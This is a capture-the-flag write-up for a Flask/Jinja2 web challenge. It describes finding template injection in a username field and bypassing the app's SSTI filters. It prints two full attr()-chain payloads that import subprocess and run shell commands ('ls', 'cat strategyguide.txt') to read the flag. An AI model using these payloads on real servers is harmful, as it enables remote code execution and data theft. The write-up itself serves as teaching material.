Web [70 pts]
At first glance, we don’t see anything suspicious in our page or page source. Trying to access the endpoint /strategyguide.txt will return: ACCESS DENIED.
After messing around with the input, I did see that the username field is the one displaying our results. So I started experimenting with SSTI tests.
Trying this payload returns a bunch of information about the server. Exposing the backend technology (Jinja2/Flask) as well as the source code for this challenge.
Step 1
We look at the endpoint /secretserverfile.py and find this:
Making it more readable in a text editor:
Step 2
We see that there is a bunch of filters for SSTI, preventing various system commands and code execution.
After looking online at multiple ways to bypass this:
Resource: Jinja2 template injection filter bypasses
Resource: SSTI Jinja2 payloads
We came up with a payload to bypass these filters and to call subprocess to see if we can get information from the file directory:
{{request|attr(‘application’)|attr(‘__globals__’)|attr(‘__getitem__’)(‘__builtins__’)|attr(‘__getitem__’)(‘__import__’)(‘subprocess’)|attr(‘getoutput’)(‘ls’)}}
Step 3
Using the above payload will result in this:
Now since we can run commands, we cat the text file for strategyguide.txt, giving us our flag:
{{request|attr(‘application’)|attr(‘__globals__’)|attr(‘__getitem__’)(‘__builtins__’)|attr(‘__getitem__’)(‘__import__’)(‘subprocess’)|attr(‘getoutput’)(‘cat strategyguide.txt’)}}
